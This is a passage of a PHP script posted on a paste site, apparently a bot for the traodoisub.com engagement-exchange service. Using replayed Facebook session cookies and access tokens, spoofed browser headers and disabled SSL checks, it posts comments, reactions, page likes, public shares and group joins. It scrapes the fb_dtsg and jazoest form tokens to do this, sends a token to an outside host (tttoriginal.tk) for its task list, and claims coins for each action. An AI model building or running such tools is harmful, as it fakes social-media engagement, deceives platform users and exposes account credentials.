  764. $data = array('access_token' => $access_token);
  765. curl_setopt($ch, CURLOPT_POST,count($data));
  766. curl_setopt($ch, CURLOPT_POSTFIELDS,$data);
  767. $access = curl_exec($ch);
  768. curl_close($ch);
  769. return json_decode($access);
  770. }
  771. function cmt($access_token,$id,$cookie,$msg){
  772. $ch=curl_init();
  773. curl_setopt($ch, CURLOPT_URL, 'https://graph.facebook.com/'.$id.'/comments');
  774. $head[] = "Connection: keep-alive";
  775. $head[] = "Keep-Alive: 300";
  776. $head[] = "authority: m.facebook.com";
  777. $head[] = "ccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  778. $head[] = "accept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5";
  779. $head[] = "cache-control: max-age=0";
  780. $head[] = "upgrade-insecure-requests: 1";
  781. $head[] = "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
  782. $head[] = "sec-fetch-site:";
  783. $head[] = "sec-fetch-mode: navigate";
  784. $head[] = "sec-fetch-user: ?1";
  785. $head[] = "sec-fetch-dest: document";
  786. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36');
  787. curl_setopt($ch, CURLOPT_ENCODING, '');
  788. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  789. curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
  790. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  791. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  792. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  793. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
  794. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  795. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  796. $data = array('message' => $msg,'access_token' => $access_token);
  797. curl_setopt($ch, CURLOPT_POST,count($data));
  798. curl_setopt($ch, CURLOPT_POSTFIELDS,$data);
  799. $access = curl_exec($ch);
  800. curl_close($ch);
  801. return json_decode($access);
  802. }
  803. function page($id,$cookie){
  804. $ch = curl_init();
  805. curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com/'.$id);
  806. $head[] = "Connection: keep-alive";
  807. $head[] = "Keep-Alive: 300";
  808. $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  809. $head[] = "Accept-Language: en-us,en;q=0.5";
  810. curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
  811. curl_setopt($ch, CURLOPT_ENCODING, '');
  812. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  813. curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
  814. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  815. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  816. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  817. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  818. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
  819. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  820. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect
  821. :'));
  822. $page = curl_exec($ch);
  823. if (explode('&amp;refid=',explode('pageSuggestionsOnLiking=1&amp;gfid=',$page)[1])[0]){
  824. $get = explode('&amp;refid=',explode('pageSuggestionsOnLiking=1&amp;gfid=',$page)[1])[0];
  825. $link = 'https://mbasic.facebook.com/a/profile.php?fan&id='.$id.'&origin=page_profile&pageSuggestionsOnLiking=1&gfid='.$get.'&refid=17';
  826. curl_setopt($ch, CURLOPT_URL, $link);
  827. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  828. curl_exec($ch);
  829. }
  830. curl_close($ch);
  831.  
  832. }
  833. function getnv1($loai,$token){
  834. $list = file_get_contents('http://tttoriginal.tk/tds/getnv1.php?token='.$token.'&loai='.$loai);
  835. return json_decode($list);
  836. }
  837. function camxuc($id,$type,$cookie){
  838. $ch = curl_init();
  839. if(strpos($id,'_')){
  840. $uid = explode('_',$id, 2);
  841. $id2 = 'story.php?story_fbid='.$uid[1].'&id='.$uid[0];
  842. }else{
  843. $id2 = $id;
  844. }
  845. curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com/'.$id2);
  846. $head[] = "Connection: keep-alive";
  847. $head[] = "Keep-Alive: 300";
  848. $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  849. $head[] = "Accept-Language: en-us,en;q=0.5";
  850. curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14');
  851. curl_setopt($ch, CURLOPT_ENCODING, '');
  852. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  853. curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
  854. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  855. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  856. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  857. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  858. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
  859. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  860. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect
  861. :'));
  862. $page = curl_exec($ch);
  863. if ($id2 != $id && explode('&amp;origin_uri=',explode('amp;ft_id=',$page,2)[1],2)[0]){
  864. $get = explode('&amp;origin_uri=',explode('amp;ft_id=',$page,2)[1],2)[0];
  865. }else{
  866. $get = $id2;
  867. }
  868. $link = 'https://mbasic.facebook.com/reactions/picker/?is_permalink=1&ft_id='.$get;
  869. curl_setopt($ch, CURLOPT_URL, $link);
  870. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  871. $cx = curl_exec($ch);
  872. $haha = explode('<a href="',$cx);
  873. if ($type == 'LOVE'){
  874. $haha2 = explode('" style="display:block"',$haha[2])[0];
  875. }else if ($type == 'WOW'){
  876. $haha2 = explode('" style="display:block"',$haha[5])[0];
  877. }else if ($type == 'HAHA'){
  878. $haha2 = explode('" style="display:block"',$haha[4])[0];
  879. }else if ($type == 'SAD'){
  880. $haha2 = explode('" style="display:block"',$haha[6])[0];
  881. }else{
  882. $haha2 = explode('" style="display:block"',$haha[7])[0];
  883. }
  884. $link2 = html_entity_decode($haha2);
  885.  
  886. curl_setopt($ch, CURLOPT_URL, 'https://mbasic.facebook.com'.$link2);
  887. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  888. curl_exec($ch);
  889. curl_close($ch);
  890. }
  891. function loadtime($time){
  892. for ( $x = $time; $x--; $x ) {
  893. echo " \r";
  894. echo "\e[1;32m● Vui Lòng Chờ <~>\e[1;37m |\e[1;31m● \e[1;32m● \e[1;33m● \e[1;34m● \e[1;35m● \e[1;37m| ".$x."\033[1;37m |\e[1;33mGiây";
  895. usleep(170000);
  896. echo "\r";
  897. echo " \r";
  898. echo "\e[1;36m● Vui Lòng Chờ <~>\e[1;37m |\e[1;33m● \e[1;34m● \e[1;35m● \e[1;36m● \e[1;31m● \e[1;37m| ".$x."\033[1;37m |\e[1;34m Giây";
  899. usleep(170000);
  900. echo "\r";
  901. echo " \r";
  902. echo "\e[1;34m● Vui Lòng Chờ <~>\e[1;37m |\e[1;34m● \e[1;35m● \e[1;36m● \e[1;31m● \e[1;33m● \e[1;37m| ".$x."\033[1;37m |\e[1;31m Giây";
  903. usleep(170000);
  904. echo "\r";
  905. echo " \r";
  906. echo "\e[1;33m● Vui Lòng Chờ <~>\e[1;37m |\e[1;35m● \e[1;36m● \e[1;31m● \e[1;33m● \e[1;34m● \e[1;37m| ".$x."\033[1;37m |\e[1;32m Giây";
  907. usleep(170000);
  908. echo "\r";
  909. echo " \r";
  910. echo "\e[1;31m● Vui Lòng Chờ <~>\e[1;37m |\e[1;33m● \e[1;32m● \e[1;31m● \e[1;35m● \e[1;36m●\e[1;37m| ".$x."\033[1;37m |\e[1;36m Giây";
  911. usleep(170000);
  912. echo "\r";
  913. }
  914. }
  915. function datnick($id,$tokentds){
  916. $xxx = file_get_contents('https://traodoisub.com/api/?fields=run&id='.$id.'&access_token='.$tokentds);
  917. $h = json_decode($xxx)->{"success"};
  918. return $h;
  919. }
  920. function nhantien($loai,$id,$tokentds){
  921. $nhan = file_get_contents('https://traodoisub.com/api/coin/?type='.$loai.'&id='.$id.'&access_token='.$tokentds);
  922. return $nhan;
  923. }
  924. function login($tokentds){
  925. $login = file_get_contents("https://traodoisub.com/api/?fields=profile&access_token=".$tokentds);
  926. return $login;
  927. }
  928. function share($id,$token){
  929. $url= 'https://graph.facebook.com/me/feed?method=post&access_token='.$token.'&privacy={"value":"EVERYONE"}&link=https://www.facebook.com/'.$id.'/';
  930. $m = file_get_contents($url);
  931. return json_decode($m);
  932. }
  933.  
  934.  
  935. function joingr($id,$cookie){
  936. $ch = curl_init();
  937. $head_fb=array(
  938. "Host:mbasic.facebook.com",
  939. "cache-control:max-age=0",
  940. "upgrade-insecure-requests:1",
  941. "save-data:on",
  942. "user-agent:Mozilla/5.0 (Linux; Android 10; RMX1929) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Mobile Safari/537.36",
  943. "accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  944. "sec-fetch-site:cross-site",
  945. "sec-fetch-mode:navigate",
  946. "sec-fetch-user:?1",
  947. "sec-fetch-dest:document",
  948. "accept-language:vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5",
  949. "cookie:".$cookie);
  950. curl_setopt_array ($ch, array (
  951. CURLOPT_URL => "https://mbasic.facebook.com/groups/$id?_rdr",
  952. CURLOPT_FOLLOWLOCATION => false,
  953. CURLOPT_RETURNTRANSFER => 1,
  954. CURLOPT_POST => 1,
  955. CURLOPT_HTTPGET => true,
  956. CURLOPT_SSL_VERIFYPEER => 0,
  957. CURLOPT_HTTPHEADER => $head_fb,
  958. CURLOPT_HEADER => true,
  959. CURLOPT_ENCODING => TRUE));
  960. $data = curl_exec($ch);
  961. // var_dump($data);
  962. if (strpos($data,"xs=deleted") == true){
  963. echo ( $red."Token die rồi\n");
  964. }
  965. $tìm =explode("/a/group/join/?",$data);
  966. $tìm1=explode('"',$tìm[1]);
  967. $fb=explode('name="fb_dtsg" value="',$data);
  968. $fb=explode('"',$fb[1]);
  969. $fbdtsg=htmlspecialchars_decode($fb[0]);
  970. $jaz=explode('name="jazoest" value="',$data);
  971. $jaz=explode('"',$jaz[1]);
  972. $url="https://mbasic.facebook.com/a/group/join/?".htmlspecialchars_decode($tìm1[0]);
  973. $data="fb_dtsg=$fbdtsg&jazoest=".$jaz[0];
  974. curl_setopt_array ($ch, array (
  975. CURLOPT_URL => $url,
  976. CURLOPT_RETURNTRANSFER => 1,
  977. CURLOPT_CUSTOMREQUEST => "POST",
  978. CURLOPT_POSTFIELDS => $data,
  979. CURLOPT_SSL_VERIFYPEER => 0,
  980. CURLOPT_HTTPHEADER => $head_fb));
  981. $xxx = curl_exec($ch);
  982. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement